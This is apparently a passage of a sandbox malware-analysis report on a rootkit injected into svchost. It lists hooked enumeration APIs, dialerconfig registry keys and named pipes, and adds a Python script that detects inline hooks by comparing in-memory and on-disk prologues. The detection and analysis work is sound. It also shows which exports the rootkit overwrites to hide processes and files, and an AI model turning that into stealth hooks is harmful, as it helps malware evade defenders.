                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: 729b3f40a99a6114c8675349f500bf02ad9969b64215182506dd6b7d13de966c
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: 6C319574298F4AE1EA0FEFA5FCABBD46325B75434BF8054A3940902576DF3C8249C768
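The string table of this svchost function (NtQuerySystemInformation, NtQueryDirectoryFile, NtQueryDirectoryFileEx, NtEnumerateKey, NtEnumerateValueKey, NtDeviceIoControlFile, NtResumeThread, EnumServiceGroupW, EnumServicesStatusExW, resolved from ntdll.dll, advapi32.dll and sechost.dll via GetProcAddress), together with the SOFTWARE\dialerconfig subkeys seen earlier (paths, pid, process_names, service_names, startup, tcp_local, tcp_remote, udp), describes a user-mode rootkit that overwrites enumeration exports inside each process it injects into and filters the results. The practical check is therefore not "is the process list complete" but "are these prologues still the bytes on disk". The script below is an added example, not code from the sample or from Joe Sandbox: it compares each export's in-memory prologue with the clean on-disk prologue, decodes the common x64 redirect encodings and reports whether the jump target lands inside a loaded module or in an unbacked private region (the rootkit pattern). Module bases, export offsets, the stub bytes and the target address are all constructed for the demonstration; a real run would read them from a clean mapping of the DLL and from the target process's memory, and must itself run from a process the rootkit has not injected into (the report shows explorer.exe being injected), or against a memory image.

```python
"""Inline-hook check for hooked enumeration exports. Added example; all
addresses and byte strings are constructed, not taken from the sample."""
import struct

U64 = 0xFFFFFFFFFFFFFFFF


def decode_trampoline(mem, addr):
    """Recognise x64 redirect encodings hooking engines write over a prologue.
    addr is the virtual address of mem[0] (needed for RIP-relative forms).
    Returns (kind, target) or None when mem does not start with a redirect."""
    if len(mem) >= 5 and mem[0] == 0xE9:                      # JMP rel32
        rel = struct.unpack_from("<i", mem, 1)[0]
        return "jmp_rel32", (addr + 5 + rel) & U64
    if len(mem) >= 14 and mem[:2] == b"\xFF\x25":             # JMP [RIP+disp32]
        disp = struct.unpack_from("<i", mem, 2)[0]
        if disp == 0:                                         # pointer stored inline
            return "jmp_rip_indirect", struct.unpack_from("<Q", mem, 6)[0]
        return "jmp_rip_indirect", None                       # pointer lives elsewhere
    if len(mem) >= 12 and mem[:2] == b"\x48\xB8":             # MOV RAX, imm64 ...
        imm = struct.unpack_from("<Q", mem, 2)[0]
        if mem[10:12] == b"\xFF\xE0":                         # ... JMP RAX
            return "mov_rax_jmp_rax", imm
        if mem[10:12] == b"\x50\xC3":                         # ... PUSH RAX; RET
            return "mov_rax_push_ret", imm
    return None


def classify_target(target, module_ranges):
    """Name the loaded module containing target, or flag it as unbacked."""
    if target is None:
        return "unknown"
    for name, (lo, hi) in module_ranges.items():
        if lo <= target < hi:
            return name
    return "unbacked/private"


def find_inline_hooks(exports, module_ranges):
    """exports: dicts with module, name, address, disk (clean prologue bytes)
    and memory (same length, read from the live process). One finding is
    returned per export whose live prologue no longer matches disk."""
    findings = []
    for e in exports:
        clean, live = e["disk"], e["memory"]
        if live[:len(clean)] == clean:
            continue                                          # prologue intact
        decoded = decode_trampoline(live, e["address"])
        kind, target = decoded if decoded else ("modified_prologue", None)
        findings.append({"module": e["module"], "export": e["name"],
                         "address": e["address"], "kind": kind, "target": target,
                         "target_module": classify_target(target, module_ranges)})
    return findings


# Constructed demonstration data (hypothetical load address and offsets).
NTDLL_BASE = 0x7FFA00000000
MODULE_RANGES = {"ntdll.dll": (NTDLL_BASE, NTDLL_BASE + 0x1F0000)}
# Typical x64 Nt* stub: mov r10,rcx; mov eax,SSN; test byte [7FFE0308],1;
# jne +3; syscall; ret. The SSN 0x36 is a placeholder, not a real number.
CLEAN_STUB = bytes.fromhex("4C8BD1B836000000F604250803FE7F0175030F05C3")
ROOTKIT_TARGET = 0x257E10A2B2C   # an address inside the injected svchost region of the report


def run_demo():
    """Three ntdll exports: one redirected to an unbacked region (the rootkit
    pattern), one detoured within ntdll itself, one untouched."""
    qsi, qdf, enk = NTDLL_BASE + 0x9D6E0, NTDLL_BASE + 0x9D4A0, NTDLL_BASE + 0x9D320
    far_hook = b"\x48\xB8" + struct.pack("<Q", ROOTKIT_TARGET) + b"\xFF\xE0" + CLEAN_STUB[12:]
    near_target = NTDLL_BASE + 0x1A0000
    near_hook = b"\xE9" + struct.pack("<i", near_target - (qdf + 5)) + CLEAN_STUB[5:]
    exports = [
        {"module": "ntdll.dll", "name": "NtQuerySystemInformation", "address": qsi,
         "disk": CLEAN_STUB, "memory": far_hook},
        {"module": "ntdll.dll", "name": "NtQueryDirectoryFile", "address": qdf,
         "disk": CLEAN_STUB, "memory": near_hook},
        {"module": "ntdll.dll", "name": "NtEnumerateKey", "address": enk,
         "disk": CLEAN_STUB, "memory": CLEAN_STUB},
    ]
    return find_inline_hooks(exports, MODULE_RANGES)


if __name__ == "__main__":
    for f in run_demo():
        tgt = f"{f['target']:#x}" if f["target"] is not None else "?"
        print(f"{f['module']}!{f['export']} @ {f['address']:#x}: {f['kind']} -> {tgt} ({f['target_module']})")
```

A detour whose target stays inside the same module is not by itself malicious (hot-patching and some EDR products do this), which is why the target classification matters more than the mere mismatch: a jump from ntdll into a private, non-image-backed region is the signal that matches this sample's injected svchost payload. The same comparison applies unchanged to the advapi32/sechost service-enumeration exports and to NtDeviceIoControlFile, which the report shows being used together with the \Device\Nsi string to filter TCP/UDP listings.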

Control-flow Graph: function 257e1076910 (basic blocks 257e1076910 to 257e1076c2c); CRT start-up path calling __scrt_dllmain_crt_thread_attach and __scrt_dllmain_after_initialize_c plus internal sub-functions (257e1076fc0, 257e1076e54, 257e1077190, 257e107268c, 257e1085780 and others); executed/not-executed colouring and graph rendering not reproduced.
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: c413f792152c6e77bcdec011d4ce604bdbff46f8c7e2d41a41648d6f97dd56db
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 7481476178CF0586F65FBB2ABC4F3B922D0E785782F5480A49A2647797DB38C8458B0C
                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 00000257E10ACE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACEBC
                                                                          • SetLastError.KERNEL32 ref: 00000257E10ACED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,00000257E10AECCC,?,?,?,?,00000257E10ABF9F,?,?,?,?,?,00000257E10A7AB0), ref: 00000257E10ACF2C
                                                                            • Part of subcall function 00000257E10AD6CC: HeapAlloc.KERNEL32 ref: 00000257E10AD721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF54
                                                                            • Part of subcall function 00000257E10AD744: HeapFree.KERNEL32 ref: 00000257E10AD75A
                                                                            • Part of subcall function 00000257E10AD744: GetLastError.KERNEL32 ref: 00000257E10AD764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF76
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: 44b74c0836ad876a2fac46d0e824247e53a8591ac7bd446e8d08f2f1267c89cf
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: 3D4182703CDF4441FAAFA7357E5F3AD22815B447B2F6547A4A936066D6DE38C401872C

                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: fd144254930c9193e2e316754b6910d439631fa1b8b54bcb3ad30ea55ac0c1ae
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: DB214F32658F4082FB19CB25F84A75A73A0F789BA6F504255EA6903BA8CF3CC149CF04

                                                                          Control-flow Graph (rendered graph omitted from this text copy): function 257e10aa544-257e10aaa1b in the svchost dump at 257e10a0000; entry block 257e10aa544-257e10aa5ac calls 257e10ab414, exit block 257e10aaa13-257e10aaa1b calls 257e10ac748; executed / not-executed block colouring is not preserved.
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction ID: fa66f7741ebcd80bb86e54b7b1d1724f64a0d38ed48e78e569a20c50e363ff0f
                                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction Fuzzy Hash: 46E1E572648F40CAEB6ADF65E84B39D77A0F748B99F100155EE8957B95CF34C081C714

                                                                          Control-flow Graph (rendered graph omitted from this text copy): function 257e1079944-257e1079e1b in the svchost dump at 257e1070000; entry block 257e1079944-257e10799ac calls 257e107a814, exit block 257e1079e13-257e1079e1b calls 257e107bb48; executed / not-executed block colouring is not preserved.
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: eee8ddbebd137ff77ed4dfc8451c6d54f91bdde69a51e284d5195fa703101059
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: FFE1E472648F408AEB6AFF65E88B3AD37B0F7457A9F000156EE4A57B55CB34C490C704

                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction ID: cf054b1d2baf678fe8bdec6d8eaa147d53923dc8430d7e3ded5bb42e28665e5b
                                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction Fuzzy Hash: 2741C632399F0091FA1FDB16BC0B79A2391B745BE1F5942659D1E87784EF3CC4458328

                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: 9cf63d37dc8258112caa738864d3c548755d6f27b2a305309498d83b3183a8b3
                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: 27419F73218F84C6E765CF21F84A79E77A1F388B89F048129EA8907B58DF38D449CB14

                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD087
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0F0
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction ID: 3937cb81b8b0f971906db0413d64368154e2d1c9df82cae5cad0a14440eaf12d
                                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction Fuzzy Hash: C2118E707CCB8041FA6EA7357D5F36D71416B483F2F2443A4B93A066EADE78D4028728
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 1fcdb397b1644b17d16c1eb1e9d437d376732d2965c1ff5ed4ddc4445df92217
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 168117317CCF4186FB5FAB65BC4B39926D0BB89782F44C4A5DA0447396FB3AC4458728
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction ID: 1ca0844d76c3e8bd01ab4792baa35eba0e52544e90a3a5dfd8280d08fd67e20c
                                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction Fuzzy Hash: CB31F63139AF00E1EE1BDB02BC0BB5523D4B748BA2F5905659E2F4B792DF38C0458328
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction ID: 9ee7c4574fcb2fd013fb964aa6248de50fe65bdbb00ad364504beb63cc9ade48
                                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction Fuzzy Hash: 3111BF31358F4086E756CB12FC4BB1972A4F388FE6F180265EA2A87794CF38C8148748
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: 9a2b3325603176c98f4169559021404f9569204c8e58316270e8b4dcf71a70dc
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: 60118B36348F4086EF199B22F80E76A62B4FB88B86F040468DE990B794EF3DC545C718
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Current$Context
                                                                          • String ID:
                                                                          • API String ID: 1666949209-0
                                                                          • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction ID: 966c8cfc9cd363fdfda02b2bdcc18e9b8abbeec9a729aea55c5a0fc7a420839d
                                                                          • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction Fuzzy Hash: E6D1C976248F88C1DA75DB0AF89A35A77A0F388B85F104252EACD47BA9DF3CC551CB14
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction ID: cdb653347486f95d6936b3a6e080e65dbc29c48c69199ff8dba1e233120f6aa2
                                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction Fuzzy Hash: CF31D232389F5186EA1ACF16FD4BB69A7A4FB44B86F084170AE4847B55EF34C4A18314
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction ID: bbc7888f5e4037d8188519172c2121bad00389fe15c94999cae900f3cde1423e
                                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction Fuzzy Hash: A4114D703C8F8081FA6E97317E4F76D21516B487E2F1447A4B936466E6DE78C4018728
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction ID: 4c54e0cd68b01bb03e9099f5d5445d1d048295c9e60c374dc5866ed19de68462
                                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction Fuzzy Hash: 48015731348F4082EA19DB52B89AB5A63A5F788FC2F888475DE5A43754DE38C989C704
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction ID: f5791e389f93502f4c9fee8c8b73c305a7e67720a75c226d159784ea1be0102c
                                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction Fuzzy Hash: 47011775259F4086EB2ADB22FC1F71A66B0BB99B87F0404A4DA5907764EF3DC148CB18
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: dfda00a6953bd7fd31afee440e3a8cdc3f116b40ca32194e381a607924f2b4fb
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: 4C51A132749B008AEB1EDB25FC4FB593796F344B89F1081A8DA1747788EB75E981C718
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: 7996f0918551bbe49c81effb0a51052158cdeed2e265b154e812129fb940380b
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: 7A317832388B409AE71ADB21FC4BB5937A5F340B8AF158158AE5747789DB39D980C718
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction ID: d56e8e4ea1c63715ed7fae816492958a322087c5f1097162d2259ce4f6dc8c21
                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction Fuzzy Hash: C2F06272348F4192EB65CF21FCDAB5A67A1F758BCAF848060DA4946954DF3CC68DCB04
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
